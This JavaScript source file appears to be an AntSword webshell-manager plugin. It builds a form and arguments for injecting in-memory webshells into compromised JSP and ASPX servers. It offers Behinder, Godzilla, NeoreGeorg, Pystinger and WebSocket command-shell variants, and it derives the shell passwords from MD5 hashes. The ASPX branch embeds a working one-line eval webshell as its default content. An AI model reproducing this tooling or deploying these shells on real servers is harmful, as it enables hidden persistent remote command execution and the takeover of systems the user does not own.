"use strict";
const Base = require("../base");
const LANG = require("../../language"); // 插件语言库
const crypto = require("crypto");
// 内存shell模块
class MemShellInject extends Base {
  createForm(cell) {
    switch (this.shelltype) {
      case "jspjs":
      case "jsp":
        var str = [
          { type: "settings", labelWidth: 150, inputWidth: 200 },
          {
            type: "radio",
            name: "service_type",
            label: "Filter",
            checked: "1",
            value: "Filter",
            position: "label-right",
            list: [
              {
                type: "select",
                name: "Filter_type",
                label: LANG["core"]["memshell_inject"]["form"]["memshell_type"],
                inputWidth: 200,
                options: [
                  { value: "AntSword", text: "AntSword" },
                  { value: "Behinder", text: "Behinder" },
                  { value: "GodzillaBase64", text: "Godzilla-Base64" },
                  { value: "NeoreGeorg", text: "NeoreGeorg" },
                  { value: "Pystinger", text: "Pystinger" },
                  { value: "Sor", text: "Sor" },
                ],
              },
            ],
          },
          {
            type: "radio",
            name: "service_type",
            label: "WebSocket",
            checked: "0",
            value: "Ws",
            position: "label-right",
            list: [
              {
                type: "select",
                name: "Ws_type",
                label: LANG["core"]["memshell_inject"]["form"]["memshell_type"],
                inputWidth: 200,
                options: [
                  { value: "Cmd", text: "Cmd" },
                  { value: "CmdBase64", text: "CmdBase64" },
                  { value: "JSPJS", text: "JSPJS" },
                  { value: "JSPJSBase64", text: "JSPJSBase64" },
                ],
              },
            ],
          },
          { type: "newcolumn" },
          {
            type: "block",
            name: "form_block",
            offsetLeft: "25",
            offsetTop: "10",
            list: [
              {
                type: "input",
                name: "ServiceName",
                label: LANG["core"]["memshell_inject"]["form"]["ServiceName"],
                required: true,
                value: "MemShell",
              },
              {
                type: "input",
                name: "UrlPath",
                label: LANG["core"]["memshell_inject"]["form"]["UrlPath"],
                required: true,
                value: "/shell",
              },
              {
                type: "input",
                name: "ShellPass",
                label: LANG["core"]["memshell_inject"]["form"]["ShellPass"],
                required: true,
                value: "ant",
              },
              {
                type: "input",
                name: "SecretKey",
                label: LANG["core"]["memshell_inject"]["form"]["SecretKey"],
                value: "pass",
              },
            ],
          },
        ];
        break;
      case "aspxcsharp":
      case "aspx":
        var str = [
          { type: "settings", labelWidth: 100, inputWidth: 200 },
          {
            type: "radio",
            name: "service_type",
            label: "VirtualPathProvider",
            checked: "1",
            value: "VirtualPathProvider",
            position: "label-right",
          },
          {
            type: "block",
            name: "form_block",
            list: [
              {
                type: "input",
                name: "UrlPath",
                label: LANG["core"]["memshell_inject"]["form"]["UrlPath"],
                required: true,
              },
              {
                type: "input",
                name: "Content",
                label: LANG["core"]["memshell_inject"]["form"]["Content"],
                rows: "1",
                inputWidth: 300,
                inputHeight: 150,
                required: true,
                value: `<%@ Page Language="Jscript"%><%eval(Request.Item["ant"],"unsafe");%>`,
              },
            ],
          },
        ];
        break;
    }

    var form = cell.attachForm(str);
    this.form = form;

    this.showTips();
  }

  showTips() {
    let tips = "";
    switch (this.shelltype) {
      case "aspx":
      case "aspxcsharp":
        tips = `路径示例：/aaa
Shell路径：http://example.com/aaa.aspx
访问路径必须要加上aspx后缀，这样才能作为aspx文件解析。`;
        break;
      case "jsp":
        tips = ``;
        break;
      default:
        break;
    }

    this.editor.session.setValue(tips);
  }
  getArgs() {
    let args = {};
    let service_type = this.form.getCheckedValue("service_type"); //内存马种类
    let memshell_type = this.form.getItemValue(service_type + "_type"); //打入什么内存马
    switch (this.shelltype) {
      case "jspjs":
      case "jsp":
        args["UrlPath"] = this.form.getItemValue("UrlPath");
        args["ServiceName"] = this.form.getItemValue("ServiceName");
        let shell_args = {};
        switch (memshell_type) {
          case "AntSword":
            shell_args["ShellPass"] = this.form.getItemValue("ShellPass");
            break;
          case "Behinder":
            let ShellPass = crypto
              .createHash("md5")
              .update(this.form.getItemValue("ShellPass"))
              .digest("hex")
              .substr(0, 16);
            shell_args["ShellPass"] = ShellPass; // 冰蝎3.x的密码为明文md5后的前16位
            break;
          case "GodzillaBase64":
            shell_args["ShellPass"] = this.form.getItemValue("ShellPass");
            let key = this.form.getItemValue("SecretKey");
            let SecretKey = crypto
              .createHash("md5")
              .update(key)
              .digest("hex")
              .substr(0, 16); // 哥斯拉的key是明文md5处理后前16位
            shell_args["SecretKey"] = SecretKey;
            break;
          case "NeoreGeorg":
            shell_args["ShellPass"] = this.form.getItemValue("ShellPass"); // 额外密码，如果没有收到额外密码则继续filterChain
            break;
          default:
            break;
        }

        if (service_type == "Filter") {
          // Filter内存马支持解耦
          let memshell_payload_type = memshell_type + service_type;
          let shell_body_payload = this.getTemplate(
            "jsp",
            memshell_payload_type
          );
          for (let i in shell_args) {
            // 替换memshell中的变量
            shell_body_payload = this.replaceClassStringVar(
              shell_body_payload,
              i,
              shell_args[i]
            );
          }
          args["MemShellBody"] = shell_body_payload;
          this.payloadtype = "injector" + service_type;
        } else {
          for (let i in shell_args) {
            args[i] = shell_args[i];
          }
          this.payloadtype = memshell_type + service_type;
        }

        break;
      case "aspxcsharp":
      case "aspx":
        this.parammode = 2;
        this.payloadtype = service_type;
        args["content"] = Buffer.from(
          this.form.getItemValue("Content")
        ).toString("base64");
        args["path"] = this.form.getItemValue("UrlPath");

        break;
      default:
        break;
    }

    console.log(args);

    return args;
  }
}

module.exports = MemShellInject;
